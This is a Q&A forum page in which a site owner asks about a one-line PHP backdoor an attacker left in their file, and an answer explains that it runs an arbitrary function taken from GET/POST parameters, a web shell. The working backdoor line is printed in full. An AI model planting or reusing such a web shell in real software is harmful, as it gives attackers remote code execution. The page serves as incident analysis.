I found a line of script left by the hacker in one of my PHP files. And it reads like this:
<?php
($_=@$_GET[2]).@$_($_POST[1]);
?>
Can anyone please give some hints about what this line of code does? Thank you
找到黑客留下的代码,但不明白它的作用
- 写回答
- 好问题 0 提建议
- 追加酬金
- 关注问题
分享- 邀请回答
-
3条回答 默认 最新
- douou9786 2013-10-29 16:27关注
As Reeno already said in a comment, it's like a PHP shell.
Explanation
-
Store the GET variable with the key '2' in a variable called
$_. Due to PHP's nature of weak typing, we do not need quotes around the number.$_=@$_GET[2] -
Treat
$_as a callable function name and execute it with$_POST[1]as the first argument.@$_($_POST[1])
The
@operators should suppress error logging, see PHP.net: Error Control Operators.The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:
$_=@$_GET[2]; @$_($_POST[1]);Use case
Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.
本回答被题主选为最佳回答 , 对您是否有帮助呢?解决 无用评论 打赏举报 分享 -
- 2013-10-29 15:45回答 3 已采纳 As Reeno already said in a comment, it's like a PHP shell. Explanation Store the GET variable w
- 回答 2 已采纳 Id really suggest fixing your sql, just using PDO does not guarantee security, any use of php vari
- 2015-08-27 18:15回答 1 已采纳 You should not expose a sensitive ID/data. there is no "security" practice doing that. you should
- 2019-06-15 23:32学无止境-程序猿的博客 一、黑客认知 1.1-----认识黑客 黑客是一类掌握超高计算机技术的人群。凭着掌握的知识,他们既可以从事保护计算机和保护网络安全的工作,又可以选择入侵他人计算机或者破坏网络,对于黑客而言,他们所做的事情...
- 2019-05-14 16:36回答 1 已采纳 这个有很多可能性,比如os被攻破,ssh权限被拿到,直接执行了数据库的操作,或者你的应用有sql注入漏洞,于是执行了sql 或者你的系统有病毒,病毒直接攻击本机(比如勒索病毒一类的),还可能是web
- 2018-06-26 19:47回答 3 已采纳 You've to sanitizing user input as said @kevin Cai You've an error in line: if($response.success=
- 2012-09-28 22:12回答 2 已采纳 Disclaimer After Decoding i arrived at http://pastebin.com/VGqeGDkH. Please don't run the ab
- 2024-04-30 11:51网安猫叔的博客 本篇文章给大家谈谈黑客技术零基础入门怎么学,以及黑客初级入门对应的知识点,希望对各位有所帮助。
- 2013-10-15 21:20回答 2 已采纳 To me, it does look like a hack attempt. From PHP Release Announcement page Some systems supp
- 2017-08-15 13:09回答 3 已采纳 The way you have set your code out isn't how Laravel should be used. For best usage of Laravel yo
- 2021-09-29 18:24回答 2 已采纳 Python 技能树这里有一个可以: 技能树答题 技能树答题 https:
- 2020-06-30 17:46布瑞泽的童话的博客 《增长黑客》作为互联网产品策划必读书籍,详细介绍了如何让产品发展更好,并列举了各种案例和方法论。笔者作为技术人员,阅读《增长黑客》后整理笔记于此。忙碌的朋友们可以从本文看看是否有兴趣和必要去拜读下...
- 2016-02-06 22:24回答 1 已采纳 In the normal course of events, the only information about a session available to the client is th
- 2023-03-06 19:13奇安信代码卫士的博客 这个严重的 Apache Struts RCE 漏洞补丁不完整 Apache Cassandra 开源数据库软件修复高危RCE漏洞 美国国土安全部:Log4j 漏洞的影响将持续十年或更久 Apache Log4j任意代码执行漏洞安全风险通告第三次更新 PHP包管理...
- 2019-10-04 05:21509728263的博客 《增长黑客》节选与笔记 自序 1.1 创业家的黑暗前传 1.2 增长黑客的胜利 1.3 什么是“增长黑客” 1.4 增长黑客的职责和特质 1.5 一切用数据说话 1.6 增长黑客担任的团队角色 1.7 如何招聘增长黑客 1.8 如何...
- 没有解决我的问题, 去提问
悬赏问题
- ¥15 微信小程序协议怎么写
- ¥15 c语言怎么用printf(“\b \b”)与getch()实现黑框里写入与删除?
- ¥20 怎么用dlib库的算法识别小麦病虫害
- ¥15 华为ensp模拟器中S5700交换机在配置过程中老是反复重启
- ¥15 java写代码遇到问题,求帮助
- ¥15 uniapp uview http 如何实现统一的请求异常信息提示?
- ¥15 有了解d3和topogram.js库的吗?有偿请教
- ¥100 任意维数的K均值聚类
- ¥15 stamps做sbas-insar,时序沉降图怎么画
- ¥15 买了个传感器,根据商家发的代码和步骤使用但是代码报错了不会改,有没有人可以看看